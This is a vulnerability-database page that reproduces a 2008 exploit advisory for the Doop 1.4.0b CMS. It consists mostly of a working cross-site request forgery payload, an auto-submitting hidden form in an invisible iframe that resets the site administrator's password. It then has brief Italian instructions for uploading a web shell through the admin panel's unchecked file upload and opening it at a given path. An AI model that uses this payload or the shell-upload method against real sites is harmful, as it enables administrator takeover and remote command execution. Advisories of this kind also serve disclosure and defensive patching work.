Lucene search

Doop 1.4.0b XSRF / Shell Upload

🗓️ 31 Dec 2008 00:00:00Reported by X0rType

packetstorm🔗 packetstormsecurity.com👁 17 Views

Doop 1.4.0b XSRF / Shell Upload. CSRF change admin pass, shell upload vulnerability found in Doop 1.4.0b. Allows unauthorized users to change admin password and upload shell to execute commands

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`--------------------------------------------------------------------------  
| Project: Doop <= 1.4.0b CSRF && Upload Shell |  
| Author: x0r |  
| Email: [email protected] |  
|________________________________________________________________________|  
  
  
#-- CSRF Change Admin Pass --#  
  
----------------------------------------------------------------------  
<iframe name="noscreen" frameborder="0" height="0" width="0"></iframe>   
<form name="admin" action="http://[site/[path]/index.php?action=admin"  
method="post" target="noscreen">  
<input type="hidden" name="save" value="[Your_Pass]">  
<input type="submit" name="submit" value="Save">   
</form><script>document.admin.submit()</script>  
----------------------------------------------------------------------  
  
  
#-- Upload Shell --#  
  
Ok. Una volta nel pannello di amministrazione possiamo uppare qualsiasi  
file ( non controlla l'estensione), quindi anche shell...una volta uppata  
la shell, possiamo usarla al seguente link:  
http://[site]/[path]/pages/[shell.php].  
  
  
# x0r  
-- w00t Zone - w00tzone.org   
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

31 Dec 2008 00:00Current

7.4High risk

Vulners AI Score7.4